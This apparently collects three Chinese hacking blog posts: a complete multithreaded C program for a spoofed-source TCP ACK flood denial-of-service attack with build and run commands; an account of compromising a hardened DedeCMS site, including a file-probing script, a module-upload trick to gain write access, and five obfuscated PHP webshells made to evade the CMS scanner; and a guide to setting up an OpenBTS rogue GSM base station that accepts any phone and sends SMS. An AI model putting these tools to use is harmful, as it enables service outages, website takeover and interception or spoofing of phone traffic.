ack flood攻击同样是利用TCP三次握手的缺陷实现的攻击， ack flood攻击利用的是三次握手的第二段，也就是TCP标志位syn和ack都置1，攻击主机伪造海量的 虚假ack包发送给目标主机，目标主机每收到一个带有 ack标志位的数据包时，都会去自己的TCP连接表中查看有没有与ack的发送者建立连接 ，如果有则发送三次握手的第三段ack+seq完成三次握手，成功 建立TCP连接。如果没有则发送ack+rst 断开连接。但是在这个过程中会消耗一定的CUP计算资源，如果瞬间 收到海量的syn+ack数据包将会 消耗大量的cpu资源使得正常的连接无法建立或者增加延迟，甚至造成服务器瘫痪、死机。 理论上目标主机的TCP连接越多ack攻击效果越好，所以如果syn flood与ack flood配合使用效果会更明显。下面的代码采用多线程威力非常大，仅供测试，切勿非法使用，实现代码如下（后面有已编译的脚本直接可用）：/* * ack code author:minet */ #include <unistd.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <string.h> #include <stdlib.h> #include <stdio.h> #include <pthread.h> #include <netinet/tcp.h> #include <netinet/ip.h> #include <netinet/in.h> #include <netinet/if_ether.h> #include <netdb.h> #include <net/if.h> #include <arpa/inet.h> #define MAX_PACKET_SIZE 65534 #define PHI 0x9e3779b9 static unsigned long int Q[4096], c = 362436; volatile int limiter; volatile unsigned int pps; volatile unsigned int sleeptime = 100; void init_rand(unsigned long int x) { int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } } unsigned long int rand_cmwc(void) { unsigned long long int t, a = 18782LL; static unsigned long int i = 4095; unsigned long int x, r = 0xfffffffe; i = (i + 1) & 4095; t = a * Q[i] + c; c = (t >> 32); x = t + c; if (x < c) { x++; c++; } return (Q[i] = r - x); } unsigned short csum (unsigned short *buf, int count) { register unsigned long sum = 0; while( count > 1 ) { sum += *buf++; count -= 2; } if(count > 0) { sum += *(unsigned char *)buf; } while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); } return (unsigned short)(~sum); } unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) { struct tcp_pseudo { unsigned long src_addr; unsigned long dst_addr; unsigned char zero; unsigned char proto; unsigned short length; } pseudohead; unsigned short total_len = iph->tot_len; pseudohead.src_addr=iph->saddr; pseudohead.dst_addr=iph->daddr; pseudohead.zero=0; pseudohead.proto=IPPROTO_TCP; pseudohead.length=htons(sizeof(struct tcphdr)); int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr); unsigned short *tcp = malloc(totaltcp_len); memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo)); memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr)); unsigned short output = csum(tcp,totaltcp_len); free(tcp); return output; } void setup_ip_header(struct iphdr *iph) { iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr); iph->id = htonl(54321); iph->frag_off = 0; iph->ttl = MAXTTL; iph->protocol = 6; iph->check = 0; iph->saddr = inet_addr("192.168.3.100"); } void setup_tcp_header(struct tcphdr *tcph) { tcph->source = rand(); tcph->seq = rand(); tcph->ack_seq = rand(); tcph->res2 = 0; tcph->doff = 5; tcph->ack = 1; tcph->window = rand(); tcph->check = 0; tcph->urg_ptr = 0; } void *flood(void *par1) { char *td = (char *)par1; char datagram[MAX_PACKET_SIZE]; struct iphdr *iph = (struct iphdr *)datagram; struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr); struct sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = rand(); sin.sin_addr.s_addr = inet_addr(td); int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); if(s < 0){ fprintf(stderr, "无法打开原始套接字..\n"); exit(-1); } memset(datagram, 0, MAX_PACKET_SIZE); setup_ip_header(iph); setup_tcp_header(tcph); tcph->dest = rand(); iph->daddr = sin.sin_addr.s_addr; iph->check = csum ((unsigned short *) datagram, iph->tot_len); int tmp = 1; const int *val = &tmp; if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){ fprintf(stderr, "无法设置HDRINCL..\n"); exit(-1); } init_rand(time(NULL)); register unsigned int i; i = 0; while(1){ sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)); iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF); iph->id = htonl(rand_cmwc() & 0xFFFFFFFF); iph->check = csum ((unsigned short *) datagram, iph->tot_len); tcph->seq = rand_cmwc() & 0xFFFF; tcph->source = htons(rand_cmwc() & 0xFFFF); tcph->check = 0; tcph->check = tcpcsum(iph, tcph); pps++; if(i >= limiter) { i = 0; usleep(sleeptime); } i++; } } int main(int argc, char *argv[ ]) { if(argc < 5){ fprintf(stderr, "请按照格式输入正确的参数\n"); fprintf(stdout, "启动格式: %s <目标IP> <线程数量> <流量限制/-1为不限制/填-1即可> <攻击时间/按照秒计时>\n", argv[0]); exit(-1); } fprintf(stdout, "设置套接字…\n"); int num_threads = atoi(argv[2]); int maxpps = atoi(argv[3]); limiter = 0; pps = 0; pthread_t thread[num_threads]; int multiplier = 100; int i; for(i = 0;i<num_threads;i++){ pthread_create( &thread[i], NULL, &flood, (void *)argv[1]); } fprintf(stdout, "开始攻击..\n"); for(i = 0;i<(atoi(argv[4])*multiplier);i++) { usleep((1000/multiplier)*1000); if((pps*multiplier) > maxpps) { if(1 > limiter) { sleeptime+=100; } else { limiter--; } } else { limiter++; if(sleeptime > 25) { sleeptime-=25; } else { sleeptime = 0; } } pps = 0; } return 0; }将脚本上传到服务器，然后编译使用以下命令对源代码进行编译gcc 脚本名称.c -o 脚本名称 -lpthread或者gcc 脚本名称.c -lpthread -lpcap -o 脚本名称编译完成后需要对该脚本赋予足够的权限chmod 755 脚本名称然后即可开始测试，输入命令./ack 目标IP 线程数量 流量限制/-1为不限制/填-1即可 攻击时间/按照秒计时， 例如：./ack 127.0.0.1 10 -1 300 

需要对一个使用dedecms搭建的网站进行一次渗透，对方的网站的防护人员具有一定的安全意识，已经在很多的敏感的地方进行了加固，常见的dedecms漏洞都已经修复了，常见的可能存在的漏洞模块也被清除了，网站也是不是在godaday上面。而我目前的信息是知道了后台的登录地址，管理员的账号密码。最终的目的就是要求这个网站无法访问。信息收集使用管理员的账号登陆到后台页面进行查看，发现防护人员删除了 文件管理模块 ，这里的删除指的是防护人员是直接删除了文件管理员模块对应的那几个文件，而不是在dedecms后台上面的删除，因为我当时想通过直接安装文件管理模块时失败了。通过在后台页面进行查看，发现这个网站之前已经被人种马了，但是管理员是直接不启用这个php文件。通过分析，我认为管理员可能通过删除物理文件的方式已经将很多的文件进行了删除。我们已经进入了后台，而且虚拟主机很难提权，那么我们想的是通过在网站中布置大量的木马，让网站在我的控制之下。那么此时就需要知道目前还有那些文件是可以访问的，就写了下面一个简单的diff脚本。import argparse import os from urllib.parse import urljoin import requests # import os.path # 程序没有使用协程，速度略慢 def access(url): headers = { 'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36', } response = requests.get(url,headers=headers) return response.status_code == requests.codes.ok # def get_access(files,baseurl): can_access_files= [] for file in files: url = urljoin(baseurl,file) print(url) canaccess = access(url) if canaccess: can_access_files.append(file) return can_access_files # 得到了本地所有的文件 def get_local_files(filepath): # 遍历本地所有的文件 files = [] for parent,dirnames,filenames in os.walk(filepath): for filename in filenames: abspath = os.path.join(parent,filename) # 得到文件的后缀 file_suffix = os.path.splitext(os.path.basename(abspath))[1][1:] if file_suffix in suffix: relativepath = os.path.relpath(abspath,filepath) files.append(relativepath) return files def main(filepath,local,remote,suffix): files = get_local_files(filepath) files = [file.replace('\\','/')for file in files] local_access_files = get_access(files,local) local_access_files = [file.replace('\\','/')for file in local_access_files] remote_access_files = get_access(local_access_files,remote) urls = [urljoin(remote,file) for file in remote_access_files] urls_str = '\r'.join(urls) with open('urls.txt','w') as file: file.write(urls_str) print('运行完毕') if __name__ == '__main__': parser = argparse.ArgumentParser(description='dedecms diff') parser.add_argument('-f', '--file',required=True, dest='localfile', action='store', help='the dedecms local file') parser.add_argument('-l', '--local',required=True, dest='local', action='store', help='the dedecms local host') parser.add_argument('-r', '--remote',required=True, dest='remote', action='store', help='the dedecms remote host') parser.add_argument('-s', '--suffix',default='php', nargs='*', dest='suffix', action='store', help='the file that you want to diff') args = parser.parse_args() filepath = args.localfile local = args.local remote = args.remote suffix = args.suffix main(filepath,local,remote,suffix) 由于目前还是一个单线程的脚本，在访问目标网站的时候，速度会比较慢，后续可能到使用协程的方式来解决速度慢的问题。通过这种方式，就可以知道目前网站的防护人员删除了哪些本可以正常访问的php文件。修复文件管理模块发现虽然网站的防护人员手动删除了dedecms的文件上传模块，但是我可以通过手动上传一个打包的文件上传模块上去，这样我就可以有一个文件上传模块，这样就可以做很多的事了。在上传模块的时候，有一点需要注意的地方是在于，在导出模块的时候，需要选择导出的文件名，此时需要修改文件名，否则就会和已知的文件名相重复，这个比较难以描述，但是大家实际动手操作一边就知道了。在本地打包好了文件管理模块进行安装时，发现需要安装文件管理模块的目录没有写入权限，那么说明就无法通过这种方式来安装文件管理模块。如果无法上传文件管理模块，那么其他的后续操作都无法进行了。dedecms文件上传模块分析其实上传的dedecms的文件模块就是一个xml文件，观察xml的格式如下：<module> <oldfilelist> file_manage_control2.php file_manage_main2.php file_manage_view2.php file_pic_view2.php templets/file_edit2.htm templets/file_manage_main2.htm templets/file_pic_view2.htm </oldfilelist> </systemfile> <modulefiles> <file type='file' name='file_manage_control2.php'> 对应的file_manage_control2.php文件中的代码的base64decode </file> ....... 上面显示的就是部分xml文件格式代码从中可以看到 <oldfilelist> 中就声明了模块所需要的所有的文件，同时还表明了文件的路径。那么对于默认的路径无法进行写入，我就尝试其他的目录是否具有写入权限，修改的方式也很简单。<module> <oldfilelist> /uploads/allimg/test.php </oldfilelist> </systemfile> <modulefiles> <file type='file' name='test.php'> 对应的file_manage_control2.php文件中的代码的base64decode </file> ....... 经过测试可以在dedecms中的 uploads/allimg 可以进行写入。那么具有写入权限，这样我们就可以写入一句话木马和大马了。写入木马我首先在 uploads/allimg 下放置了一个大马。这样就可以通过大马上传文件了，在使用大马上传文件的时候具有写入权限就可以了。本次的目标的最终目的就是要求在网站中尽可能地防止木马，让网站无法正常使用或者是完全处于我的控制一下。由于dedecms自带有一个简单的病毒防护模块，如下图所示：在dedecms中的病毒扫描中会对代码中的 eval|cmd|system|exec|_GET|_POST ,这些进行检测。那么这就要求我们的一句话木马不能含有这些字符，同时还需要像正常的代码文件。因为部分的一句话木马虽然不含有这些关键字，但是网站的防护人员一看就知道这是木马，而不是正常的代码。说了这么多，就是我们的木马具有伪装性。下面就给出了当时我们所使用的一句话木马，由于当时的网站并没有使用盾、狗、锁。所以以下的代码不保证能够防御这些。木马1<?php $uf="snc3"; $ka="IEBldmFbsK"; $pjt="CRfUE9TVF"; $vbl = str_replace("ti","","tistittirti_rtietipltiatice"); $iqw="F6ciddKTs="; $bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke"); $sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn"); $tmp = $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw)); $mpy = $sbp('', $tmp); $mpy(); ?> 从这个代码中可以看到，没有看出任何的关键字，但是出现了 str_replace 。下面就对这个一句话木马进行简要的分析$ka.$pjt.$uf.$iqw 组合起来就是 IEBldmFbsKCRfUE9TVFsnc3F6ciddKTs= $vbl 是 str_replace $bkf 是 base64_decode $sbp 是 create_function ,关于create_function参考 create_function那么实际的代码为:$mpy = create_function('', '@eval($_POST['sqzr']);'); $mpy(); 这样就是一个简单的一句话木马了。木马2<?php error_reporting(0); set_time_limit(0); $a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0"); $a(@${"_P"."O"."S"."T"}[xw]); ?> 这个代码也十分的明显了，其中的 $a 最后得到就是 assert ，这个主要是通过 base64_decode 来解决的。同时使用了 error_reporting(0);set_time_limit(0); 来屏蔽出错信息。木马3<?php $adminDirhand=str_replace('f',"","bfafsfef6f4f_fdfefcfofdfe"); $Htmlreplace=str_replace('X','','gXzXiXnXfXlate'); $adminDirhand=($Htmlreplace($adminDirhand("SywuTi0qAQA="))); @$adminDirhand(${"_P"."O"."S"."T"} ['ms']); ?> 这个木马主要是通过 base64_decode 来进行隐藏代码。$adminDirhand 就是 base64_decode $Htmlreplace 是， gzinflate ， gzinflate 是php中的一个压缩方法。那么最后的代码就是$t = gzinflate(base64_decode("SywuTi0qAQA=")) //得到$t是assert assert(${"_P"."O"."S"."T"} ['ms']); 最后木马看起就非常的简单，这个木马主要是结合了 base64_decode 和 gzinflate 。关于 gzinflate 的一句话木马可以看文章， eval(gzinflate(base64_decode解密方法木马4<?php $tmp = base64_decode('W0BldmFsKCRfUE9TVFttc2d1YW5jaGFdKTtd'); @preg_replace("/\[(.*)\]/e",'\\1',$tmp); 这个木马也比较的简单，使用了 preg_replace 中的参数 /e ，这样就可以执行代码了。比较常见的一句话木马，但是这个函数在后面的php版本中已经取消了木马5<?php $cfg_base=chr(99).chr(104).chr(114); $cfg_base_path=$cfg_base(101).$cfg_base(118).$cfg_base(97).$cfg_base(108).$cfg_base(40).$cfg_base(36).$cfg_base(95).$cfg_base(80).$cfg_base(79).$cfg_base(83).$cfg_base(84).$cfg_base(91).$cfg_base(109).$cfg_base(115).$cfg_base(103).$cfg_base(117).$cfg_base(97).$cfg_base(110).$cfg_base(99).$cfg_base(104).$cfg_base(97).$cfg_base(93).$cfg_base(41).$cfg_base(59); $cfg_base_encode=$cfg_base(99).$cfg_base(114).$cfg_base(101).$cfg_base(97).$cfg_base(116).$cfg_base(101).$cfg_base(95).$cfg_base(102).$cfg_base(117).$cfg_base(110).$cfg_base(99).$cfg_base(116).$cfg_base(105).$cfg_base(111).$cfg_base(110); $_=$cfg_base_encode("",$cfg_base_path); @$_(); ?> 这个虽然是一句话木马，但是一看就知道是一句话木马。下面就是对这个一句话木马的简单分析。$cfg_base 是 chr $cfg_base_path 是 eval($_POST[msguancha]); $cfg_base_encode 是 create_function那么最后的一句话木马的格式就是:$tmp = create_function('',`eval($_POST[msguancha]);`); @$tmp(); 这个也主要利用的是 create_function 来创建一句话木马的。上面所有的木马都可以逃过dedecms自带的检测，而且这些代码也不是特别像一句话木马。至于如何插入一句话代码，这个很简单，本篇文章就不作说明了。

上次我写了osmocombb配合c118嗅探短信的文章，很多朋友留言让我写搭建openbts的，对于openbts其实很简单，官方文档就可以，主要是很多的环境依赖对于新手来说不好安装。所以今天我就出一个详细的openbts搭建基站。安装所需：ubuntu(系统)openbts2.8osmocomlibosmo-dsp安装步骤：一、安装libosmo-dsp分之：对于osmocom的libosmo-dsp分之，首先需要先安装osmocom，对于osmocom我之前写的文章很详细的写到了在这篇文章的“请安装下面的步骤来安装下载所需要的$ git clone git://git.osmocom.org/libosmocore.git$ git clone git://git.osmocom.org/osmocom-bb.git$ git clone git://git.osmocom.org/libosmo-dsp.git (openbts要用的)在安装libosmocore执行./configure 的时候很多人会遇到 No package ‘talloc’ found 这种错误，因为找不到talloc，下面是解决办法$ wget https://www.samba.org/ftp/talloc/talloc-2.1.7.tar.gz$ tar -zxvf talloc-2.1.7.tar.gz$ cd talloc-2.1.7/$ ./configure$ make$ sudo make install安装libosmocore$ cd libosmocore/$ autoreconf -i$ ./configure$ make$ sudo make install$ cd ..安装libosmo-dsp$ cd libosmo-dsp/$ autoreconf -i$ ./configure$ make$ sudo make install$ cd..安装osmocom-bb$ cd osmocom-bb/$ git checkout sylvain/testing$ cd src$ make HOST_layer23_CONFARGS=--enable-transceiver执行下面命令，刷入c118(如果刷入失败。。请检查你的c118是否接好)$ sudo ./osmocon -p /dev/ttyUSB0 -m c123xor ../../target/firmware/board/compal_e88/trx.compalram.bin二、下载安装openbts下面所有操作都在root权限下所以获取root权限$ su下载openbts2.8$ svn co http://wush.net/svn/range/software/public(如果提示没有svn的话现在安装一下svn)$ apt-get install subversion(安装svn)  安装需要的依赖(很多人安装openbts各种错误就是因为环境依赖的问题)$ sudo apt-get install autoconf libtool libosip2-dev libortp-dev libusb-1.0-0-dev g++ sqlite3 libsqlite3-dev erlang libreadline6-dev libncurses5-dev安装openbts(进入刚才下载openbts的目录里面有一个public目录)  $ cd public$ cd a53/trunk$ make install$ cd openbts/trunk$ autoreconf -i$ ./configure$ make$ cd apps$ ln -s ../TransceiverRAD1/transceiver .$ mkdir /etc/OpenBTS(在etc下面创建目录存放openbts的配置文件)$ cd ..$ sqlite3 -init ./apps/OpenBTS.example.sql /etc/OpenBTS/OpenBTS.db ".quit"(openbts的配置文件)$ sudo mkdir -p /var/lib/asterisk/sqlite3dir$ sqlite3 /etc/OpenBTS/OpenBTS.db .dump(查看数据库文件是否成功)  如果成功显示配置文件的内容那就成功了安装sipauthserve(SIP 鉴权服务)然后我们在回到public目录安装sipauthserve$ cd subscriberRegistry/trunk$ make$ sudo sqlite3 -init subscriberRegistry.example.sql /etc/OpenBTS/sipauthserve.db ".quit"(sipauthserve的配置文件同样在刚才openbts配置文件的目录)安装smqueue(短信服务)回到public目录$ cd smqueue/trunk$ autoreconf -i$ ./configure$ make$ sudo sqlite3 -init smqueue/smqueue.example.sql /etc/OpenBTS/smqueue.db ".quit"(同样的smqueue配置文件)好了现在全部都安装好了，咱们来开始启动openbts第一步先刷入c118(注意下面的操作依然是root权限)$ osmocom-bb/src/host/osmocon/osmocon -p /dev/ttyUSB0 -m c123xor ../../target/firmware/board/compal_e88/trx.compalram.bin  第二步利用c118做openbts的收发器，ARFCN是基站信息，你可以扫描附近的基站，利用cell可以先扫描基站信息，找个最强的$ osmocom-bb/src/host/layer23/src/transceiver/transceiver ARFCN  第三步启动openbts(新手朋友注意。这里是打开4个新的终端。。不是在一个终端里面执行)$ smqueue/trunk/smqueue/smqueue$ subscriberRegistry/trunk/sipauthserve$ openbts/trunk/apps/OpenBTS$ openbts/trunk/apps/OpenBTSCLI启动成功后，咱们还有一步就是配置OpenBTSCLI(修改openbts的配置，这一步很重要)启动OpenBTSCLI后，我们需要修改几处配置$ config(这条命令可以查看你的配置文件)https://1.bp.blogspot.com/-LiP6wODk3Dg/V381LDCynpI/AAAAAAAAAD4/c4pFA3rgdagmcitTcrm3N_ojicTetI7bACLcB/s1600/H%2529DXTU%257D%2529E%2529RHOXDBV%252875OI7.jpg$ config Control.LUR.OpenRegistration .*(修改Control.LUR.OpenRegistration可以让任何的手机加入基站)$ config GSM.Radio.C0 ARFCN(这里的ARFCN是 transceiver 监视的基站信息)$ config GSM.Identity.MCC 001$ config GSM.Identity.MNC 01(MCC MNC 移动国家码，这里用001 01这是测试网络)最后终于可以用手机搜索并连接bts你手机应该会看见Test PLMH 1-1(如果看不见就多试几次。。或者换基站。。毕竟是c118最激动的时候到了测试短信看到OpenBTSCLI终端窗口执行$ tmsis(查看链接到基站的ismi)$ sendsms TMSIS number messege(TMSIS就是刚才tmsis查看到的ismi，number就是你要发送过去的电话号码，messege是短信内容)